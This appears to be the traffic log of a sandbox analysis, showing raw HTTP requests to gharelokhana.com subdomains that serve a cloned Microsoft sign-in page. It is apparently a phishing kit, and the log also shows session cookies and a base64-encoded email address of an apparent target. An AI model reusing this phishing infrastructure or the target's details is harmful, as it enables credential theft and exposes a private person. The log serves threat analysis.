            Source: global trafficHTTP traffic detected: GET /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: e7a91062-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://djdjkdlellekkff.gharelokhana.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="Sec-WebSocket-Key: cAtyGZPXWa2iYTHSEyGLWA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A&sso_reload=true HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/?km=a2xhdXMubWFkZXJAc2JvLmNvLmF0%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A$$$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9AAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1Host: e7a91062-5bf3911d.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_nin8k2ycrbzww8zl5vxkaq2.css HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://djdjkdlellekkff.gharelokhana.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://djdjkdlellekkff.gharelokhana.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://djdjkdlellekkff.gharelokhana.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: l1ve.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1Sec-WebSocket-Key: 1Lv6nqYKBI+cV+CyYjVvjA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_h6TdaK6cfsrg175w47aRCA2.js HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /Prefetch/Prefetch.aspx HTTP/1.1Host: 67f9d952-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1Host: djdjkdlellekkff.gharelokhana.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://djdjkdlellekkff.gharelokhana.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0Sec-WebSocket-Key: dqP/U45K2Fb1jc/ls5NZPw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /sbo.co.at/winauth/ssoprobe?client-request-id=8d97587d-1931-4a24-9948-0d928dffd68c&_=1733383491884 HTTP/1.1Host: 5088df79-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
            Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1Host: 82ce8558-5bf3911d.gharelokhana.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://djdjkdlellekkff.gharelokhana.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
